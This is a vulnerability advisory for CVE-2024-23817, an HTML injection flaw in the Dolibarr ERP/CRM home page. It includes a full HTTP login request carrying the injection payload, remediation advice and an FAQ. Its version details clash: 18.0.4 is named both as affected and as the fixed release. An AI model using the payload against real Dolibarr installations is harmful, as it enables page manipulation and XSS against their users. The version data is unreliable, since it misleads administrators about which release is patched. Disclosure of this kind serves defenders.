CVE-2024-23817: Dolibarr Application Home Page HTML injection vulnerability
Summary Observed a HTML Injection vulnerbaility in the Home page of Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application's response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS).
Details 1. Navigate to the login page of Dolibarr application. 2. Submit a login request with the following payload in an arbitrarily supplied body parameter: "u70ea%22%3e%3c!--HTMLInjectionBySai"=1
HTTP Post Request: POST /dolibarr/index.php?mainmenu=home HTTP/1.1 Host: 192.168.37.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://192.168.37.129/dolibarr/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 375 Origin: http://192.168.37.129 Connection: close Cookie: <Redacted> Upgrade-Insecure-Requests: 1
token=697c1f303ef1976a713eda01d20d8eab&actionlogin=login&loginfunction=loginfunction&backtopage=&tz=5.5&tzstring=Asia%2FKolkata&dstobserved=0&dstfirst=&dstsecond=&screenwidth=1280&screenheight=587&dolhidetopmenu=&dolhideleftmenu=&doloptimizesmallscreen=&dolnomousehover=&dolusejmobile=&username=admin&password=manikanta&u70ea%22%3e%3c!--HTMLInjectionBySai=1
3. Upon successful injection of the payload, some part of Home page HTML code was commented out.
POC Kindly go through the below video for detailed steps:
https://user-images.githubusercontent.com/26869643/294010332-ff88d80b-cb26-4870-82d3-fb49f7ecc32f.mp4
Remediation Suggestion Kindly validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks. Implement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML.
Other sources
Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Version 18.0.4 has a HTML Injection vulnerability in the Home page of the Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application's response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS). To remediate the issue, validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks; and implement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
Dolibarrto a version that resolves this vulnerability.Fixed in 18.0.4 - Configuration
Implement proper output encoding when rendering user-provided data on the Dolibarr Home page so injected input (e.g., in HTML attributes) is treated as plain text, not executable HTML.
Dolibarr application (HTML rendering for Home page) output encoding for user-provided data = Ensure user-supplied data is rendered as plain text (proper output encoding) rather than executable HTML - Configuration
Validate and sanitize all user-supplied input—particularly values that may be rendered inside HTML attributes—to prevent HTML injection/XSS.
Dolibarr application (input handling) input validation/sanitization = Validate and sanitize all user-supplied input, especially within HTML attributes
Event History
Frequently Asked Questions
What is the severity of CVE-2024-23817?
CVE-2024-23817 has been classified as a moderate-severity vulnerability due to the potential for HTML injection.
How do I fix CVE-2024-23817?
To fix CVE-2024-23817, upgrade to a patched version of Dolibarr beyond 18.0.4 that addresses HTML injection issues.
What systems are affected by CVE-2024-23817?
CVE-2024-23817 specifically affects Dolibarr version 18.0.4.
What can an attacker do with CVE-2024-23817?
With CVE-2024-23817, an attacker can inject arbitrary HTML tags into the Dolibarr application, potentially manipulating its rendered content.
Is there a workaround for CVE-2024-23817?
Currently, the most effective workaround for CVE-2024-23817 is to upgrade to a secured version of Dolibarr that does not contain the vulnerability.